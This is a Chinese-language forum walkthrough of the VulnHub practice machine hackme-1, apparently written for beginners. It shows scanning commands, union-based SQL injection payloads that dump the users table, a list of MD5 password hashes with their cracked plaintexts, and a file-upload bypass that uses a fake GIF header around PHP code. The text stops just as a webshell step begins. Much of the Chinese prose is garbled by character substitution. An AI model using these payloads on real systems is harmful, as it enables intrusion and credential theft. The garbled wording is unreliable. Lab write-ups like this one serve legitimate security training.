靶机渗透 hackme-1(详解,适合新手)

闲聊 闲聊 1696 人阅读 | 0 人回复

<
靶机hackme-1的目录



0x01靶机形貌

靶机底子疑息:
链接https://www.vulnhub.com/entry/hackme-1,330/公布工夫18 Jul 2019做者x4bx54易度简朴靶机底子引见:
150128wmgmdsqj2stqmdj1.jpg

“hackme”是一个初教者易度等级框。目的是经由过程web破绽得到有限的权限会见,然后权限晋级为root。那个尝试室是为了模仿实践糊口状况而创立的。
“hackme”利用DHCP,而且正在mysqld大要自止封闭的状况下(十分稀有的状况),尝试强迫从头启念头器,然后机械该当能够一般事情。
取VMware比拟,VirtualBox的结果更好
0x02状况拆建


  • 下载并导进靶机
    翻开vmware–文件–翻开–hackme.ova
    150128d0yy4sgzfy8ylzyt.jpg

    150129o8e90e8vegnm7ne0.jpg

  • 检察收集适配器
    将靶机收集适配器改成NAT形式
    150129hlq3tgt9b2ddizru.jpg

  • 启动靶机
    面击 ▶靶机,开启胜利
    150129yqgbyf99v6ffpzwz.jpg

0x03靶机浸透

1、 疑息搜集


  • 主机发明
  1. arpscan -l
复造代码
150130dr630grr226s6so3.jpg


  • 端心扫描
  1. masscan --rate=100000 -p 0-65535 192.168.30.207
复造代码
150130u7umk57jfwtkktfx.jpg


  • 具体扫描
  1. nmap -T4 -sV -O -p 22,80 192.168.30.207
复造代码
150130dlax363s33l1na31.jpg


  • 目录扫描
    (1) dirb目录扫描
  1. dirb http://192.168.30.207 /usr/share/dirb/wordlists/big.txt
复造代码
150131xzwe36eiw3n1ishv.jpg

(2)gobuster目录扫描
  1. gobuster dir -e -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,zip,html -u http://192.168.30.207 -t 30
复造代码
150131kx38t3nftxxcf3sg.jpg


  • 网站指纹辨认
  1. whatweb http://192.168.30.207
复造代码
150131u8xw7xv5k4oszxzk.png

2、 破绽发掘



  • SQL注进

  • 登录主页发明登录页里,并且借能够注册用户
    150132i3d731z0j2jtat6d.jpg

  • 注册用户admin 密码123456
    150132po9m85pjmwrxos5j.jpg

  • 登录admin用户
    150132k6aaqssz0zh59x39.jpg

    单击search能够停止检察到许多的书名
    150133iooxnxk4780h1sxk.jpg

  • 考证sql注进
  1. Windows OS&#39; and 1=1#
复造代码
150133cq34qb8zlb7miyb2.jpg

  1. Windows OS&#39; and 1=2#
复造代码
150133bhmmpubbllh74hzg.jpg

由以上考证出此处存正在字符型(单引号)sql注进

  • 判定字段数
  1. Windows OS&#39; order by 3#
复造代码
150134wyjaj6appydd6vdd.jpg

  1. Windows OS&#39; order by 4#
复造代码
150134ip31gpvp1nr5pr1r.jpg

能够看出那里字段数为3

  • 判定显现地位
  1. -1&#39; union select 1,2,3#
复造代码
150134xd8s8d81aapl8psj.jpg


  • 检察当前数据库
  1. -1&#39; union select database(),2,3#
复造代码
150135nn3klkeln4zun8ej.jpg


  • 检察webapphacking库一切的表
  1. -1&#39; union select group_concat(table_name),2,3 from information_schema.tables where table_schema=&#39;webapphacking&#39;#
复造代码
150135xvocfbpxbyqnnkzj.jpg


  • 检察users表中一切的列
  1. -1&#39; union select group_concat(column_name),2,3 from information_schema.columns where table_name=&#39;users&#39;#
复造代码
150135hgnede941ktnsem9.jpg

10.检察表中user,password
  1. -1&#39; union select group_concat(user),group_concat(pasword),3 from users#
复造代码
150135bezeq5e95e0wda58.jpg


  • 将获得密码停止MD5解稀
  1. user1           5d41402abc4b2a76b9719d911017c592    hello
  2. user2           6269c4f71a55b24bad0f0267d9be5508    commando
  3. user3            0f359740bd1cda994f8b55330c86d845    p@ssw0rd
  4. test            05a671c66aefea124cc08b76ea6d30bb        testtest
  5. superadmin        2386acb2cf356944177746fc92523983        Uncrackable
  6. test1           05a671c66aefea124cc08b76ea6d30bb        testtest
  7. admin           e10adc3949ba59abbe56e057f20f883e        123456
  8. 123456            e10adc3949ba59abbe56e057f20f883e        123456
复造代码
150136arygmhhzqyrs8tm2.jpg

150136m2rueu0yhoyuusqr.jpg

150136qagzktfgkb6esrtt.jpg

那里只截了三张图,其他的解稀也一样,前面两个用户(admin,123456)是我本人方才正在网页注册的


  • 文件上传破绽

  • 利用superadmin用户登录
    150137h51bhh4e5egeg5g1.jpg

  • 发明文件上传面
150137xijiez5h7fjxiizw.jpg


  • 上传phpinfo()停止考证
建造假图片头
  1. GIF89a<?php phpinfo(); ?>
复造代码
150137gqgev0zvln6fd634.png

上传前先开启burp抓包
150138dbptnwwwqbvhgg0v.jpg

150138ytl5ijqzijlvezid.jpg


  • 阻拦-修正后缀-send,我们能够从回包中看出文件已将上传至文件夹
150138mye4h64yocwizw73.jpg


  • 疑息搜集时,目录扫描出的途径
  1. http://192.168.30.207/uploads/
  2. 会见途径
  3. http://192.168.30.207/uploads/phpinfo.php
复造代码
150139cz3tq394549o3543.jpg

该上传面存正在文件上传破绽,而且假图片头取图片马都可以
3、 破绽操纵

反弹shell办法一:一句话木马,蚁剑毗连


  • 建造图片马
[code]<span class="token delimiter important">
1、本网站属于个人的非赢利性网站,转载的文章遵循原作者的版权声明,如果原文没有版权声明,按照目前互联网开放的原则,我们将在不通知作者的情况下,转载文章;如果原文明确注明“禁止转载”,我们一定不会转载。如果我们转载的文章不符合作者的版权声明或者作者不想让我们转载您的文章的话,请您发送邮箱:Cdnjson@163.com提供相关证明,我们将积极配合您!
2、本网站转载文章仅为传播更多信息之目的,凡在本网站出现的信息,均仅供参考。本网站将尽力确保所提供信息的准确性及可靠性,但不保证信息的正确性和完整性,且不对因信息的不正确或遗漏导致的任何损失或损害承担责任。
3、任何透过本网站网页而链接及得到的资讯、产品及服务,本网站概不负责,亦不负任何法律责任。
4、本网站所刊发、转载的文章,其版权均归原作者所有,如其他媒体、网站或个人从本网下载使用,请在转载有关文章时务必尊重该文章的著作权,保留本网注明的“稿件来源”,并自负版权等法律责任。
回复 关闭延时

使用道具 举报

 
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则